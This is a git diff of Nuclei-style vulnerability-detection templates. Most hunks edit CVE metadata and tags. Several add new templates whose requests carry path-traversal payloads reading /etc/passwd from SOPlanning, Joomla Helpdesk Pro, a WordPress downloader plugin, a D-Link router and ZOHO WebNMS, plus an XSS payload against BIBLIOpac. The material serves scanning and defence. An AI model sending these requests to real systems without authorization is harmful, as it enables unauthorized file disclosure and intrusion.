cvss-score: 6.1
|
||||
cve-id: CVE-2014-4558
|
||||
cwe-id: CWE-79
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4561
|
||||
|
||||
info:
|
||||
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
|
||||
|
@ -14,7 +14,7 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2014-4561
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-4592
|
||||
|
||||
info:
|
||||
name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
|
||||
name: WP Planet <= 0.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
|
||||
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-query: inurl:"/wp-content/plugins/wp-planet"
|
||||
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve
|
||||
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -8,7 +8,6 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
|
||||
- https://www.exploit-db.com/exploits/39287
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||
- http://seclists.org/oss-sec/2014/q3/417
|
||||
classification:
|
||||
cve-id: CVE-2014-5368
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2014-8676
|
||||
|
||||
info:
|
||||
name: Simple Online Planning Tool 1.3.2 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
|
||||
- https://www.exploit-db.com/exploits/37604/
|
||||
- http://seclists.org/fulldisclosure/2015/Jul/44
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2014-8676
|
||||
cwe-id: CWE-22
|
||||
tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -8,7 +8,6 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
|
||||
- https://www.exploit-db.com/exploits/35346
|
||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||
- https://wordpress.org/plugins/dukapress/changelog/
|
||||
classification:
|
||||
cve-id: CVE-2014-8799
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-9094
|
||||
|
||||
info:
|
||||
name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
|
||||
name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2014-9444
|
||||
|
||||
info:
|
||||
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
|
||||
name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
|
||||
|
@ -12,7 +12,7 @@ info:
|
|||
- http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
|
||||
classification:
|
||||
cve-id: CVE-2014-9444
|
||||
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress
|
||||
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2015-1579
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/revslider
|
||||
google-query: inurl:/wp-content/plugins/revslider
|
||||
tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2015-4074
|
||||
|
||||
info:
|
||||
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
|
||||
- https://www.exploit-db.com/exploits/37666/
|
||||
- https://www.cvedetails.com/cve/CVE-2015-4074
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2015-4074
|
||||
cwe-id: CWE-22
|
||||
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/09/08
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2015-4127
|
||||
|
||||
info:
|
||||
name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
|
||||
name: WordPress Church Admin <0.810 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
|
||||
WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/37112
|
||||
- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
|
||||
- https://wordpress.org/plugins/church-admin/changelog/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
|
||||
classification:
|
||||
cve-id: CVE-2015-4127
|
||||
tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
|
||||
|
@ -35,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2015-5469
|
||||
info:
|
||||
name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2015/07/10/5
|
||||
- https://www.cvedetails.com/cve/CVE-2015-5469/
|
||||
- http://www.vapid.dhs.org/advisory.php?v=133
|
||||
- http://www.openwall.com/lists/oss-security/2015/07/10/5
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2015-5469
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2015,wp,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2015-7245
|
||||
|
||||
info:
|
||||
name: D-Link DVG-N5402SP - Path Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
|
||||
- https://www.exploit-db.com/exploits/39409/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7245
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2015-7245
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2015,dlink,lfi,packetstorm,edb
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgibin/webproc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-1000141
|
||||
|
||||
info:
|
||||
name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
|
||||
name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
|
||||
|
|
|
@ -7,7 +7,6 @@ info:
|
|||
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
|
||||
reference:
|
||||
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
||||
- https://www.cvedetails.com/cve/CVE-2016-2389
|
||||
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
|
||||
- https://www.exploit-db.com/exploits/39837/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2016-3088
|
||||
cwe-id: CWE-20
|
||||
tags: fileupload,kev,edb,cve,cve2016,apache,activemq
|
||||
tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2016-6601
|
||||
|
||||
info:
|
||||
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
|
||||
reference:
|
||||
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
|
||||
- https://www.exploit-db.com/exploits/40229/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2016-6601
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2016,zoho,lfi,webnms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2017-11629
|
||||
|
||||
info:
|
||||
name: FineCms 5.0.10 - Cross Site Scripting
|
||||
name: FineCMS <=5.0.10 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
|
||||
FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
|
||||
reference:
|
||||
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
|
||||
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cwe-id: CWE-434
|
||||
metadata:
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
|
||||
tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
|
||||
|
||||
requests:
|
||||
- method: PUT
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2017-14651
|
||||
|
||||
info:
|
||||
name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
|
||||
name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
|
||||
author: mass0ma
|
||||
severity: medium
|
||||
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 8.1
|
||||
cve-id: CVE-2017-15715
|
||||
cwe-id: CWE-20
|
||||
tags: apache,httpd,fileupload,vulhub,cve,cve2017
|
||||
tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cvss-score: 8.1
|
||||
cve-id: CVE-2017-5521
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2017,auth-bypass,netgear,router
|
||||
tags: cve,cve2017,auth-bypass,netgear,router,kev
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cwe-id: CWE-434
|
||||
metadata:
|
||||
shodan-query: http.title:"PhpCollab"
|
||||
tags: cve2017,phpcollab,rce,fileupload,edb,cve
|
||||
tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-11709
|
||||
|
||||
info:
|
||||
name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting
|
||||
name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cwe-id: CWE-434
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
|
||||
tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2018-16139
|
||||
|
||||
info:
|
||||
name: BIBLIOsoft BIBLIOpac 2008 - Cross Site Scripting
|
||||
author: atomiczsec
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in BIBLIOsoft BIBLIOpac 2008 allows remote attackers to inject arbitrary web script or HTML via the db or action parameter to to bin/wxis.exe/bibliopac/.
|
||||
reference:
|
||||
- https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16139
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16139
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-16139
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Bibliopac"
|
||||
tags: cve,cve2018,xss,bibliopac,bibliosoft
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>prompt(document.domain)</script>.xrf'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2018-19386
|
||||
|
||||
info:
|
||||
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
|
||||
name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
|
||||
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2018-19386/
|
||||
- https://i.imgur.com/Y7t2AD6.png
|
||||
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<a href="javascript:alert(document.domain)//'
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
id: CVE-2018-19439
|
||||
|
||||
info:
|
||||
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
|
||||
name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
|
||||
author: madrobot,dwisiswant0
|
||||
severity: medium
|
||||
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
|
||||
description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
|
||||
reference:
|
||||
- http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
|
||||
- http://seclists.org/fulldisclosure/2018/Nov/58
|
||||
- http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19439
|
||||
- http://seclists.org/fulldisclosure/2018/Nov/58
|
||||
remediation: Fixed in later versions including 5.4.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -25,3 +27,5 @@ requests:
|
|||
words:
|
||||
- "<script>alert(1337)</script><!--</TITLE>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -5,10 +5,11 @@ info:
|
|||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
|
||||
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
|
||||
reference:
|
||||
- https://github.com/domainmod/domainmod/issues/81
|
||||
- https://www.exploit-db.com/exploits/45941/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19749
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
|
@ -49,3 +50,5 @@ requests:
|
|||
- 'contains(all_headers_3, "text/html")'
|
||||
- "contains(body_3, '><script>alert(document.domain)</script></a>')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -5,11 +5,11 @@ info:
|
|||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
|
||||
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45947/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
|
||||
- https://github.com/domainmod/domainmod/issues/83
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19751
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
|
@ -58,3 +58,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -5,11 +5,11 @@ info:
|
|||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
|
||||
DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
|
||||
- https://github.com/domainmod/domainmod/issues/84
|
||||
- https://www.exploit-db.com/exploits/45949/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
|
@ -57,3 +57,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2018-19877
|
||||
|
||||
info:
|
||||
name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
|
||||
name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
|
||||
Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
|
||||
reference:
|
||||
- https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
|
||||
- https://www.exploit-db.com/exploits/45958/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19877
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -38,3 +39,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -5,10 +5,11 @@ info:
|
|||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
|
||||
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45959
|
||||
- https://github.com/domainmod/domainmod/issues/85
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19892
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
|
@ -56,3 +57,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -5,10 +5,11 @@ info:
|
|||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
|
||||
DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46375/
|
||||
- https://github.com/domainmod/domainmod/issues/87
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19914
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
|
@ -49,3 +50,5 @@ requests:
|
|||
- 'contains(all_headers_3, "text/html")'
|
||||
- 'contains(body_3, "><script>alert(document.domain)</script></a>")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -17,9 +17,9 @@ info:
|
|||
cve-id: CVE-2018-20526
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
google-dork: intitle:"Roxy file manager"
|
||||
google-query: intitle:"Roxy file manager"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
|
||||
tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-2628
|
||||
cwe-id: CWE-502
|
||||
tags: cve,cve2018,oracle,weblogic,network,deserialization
|
||||
tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2018-5715
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: intext:"SugarCRM Inc. All Rights Reserved"
|
||||
google-query: intext:"SugarCRM Inc. All Rights Reserved"
|
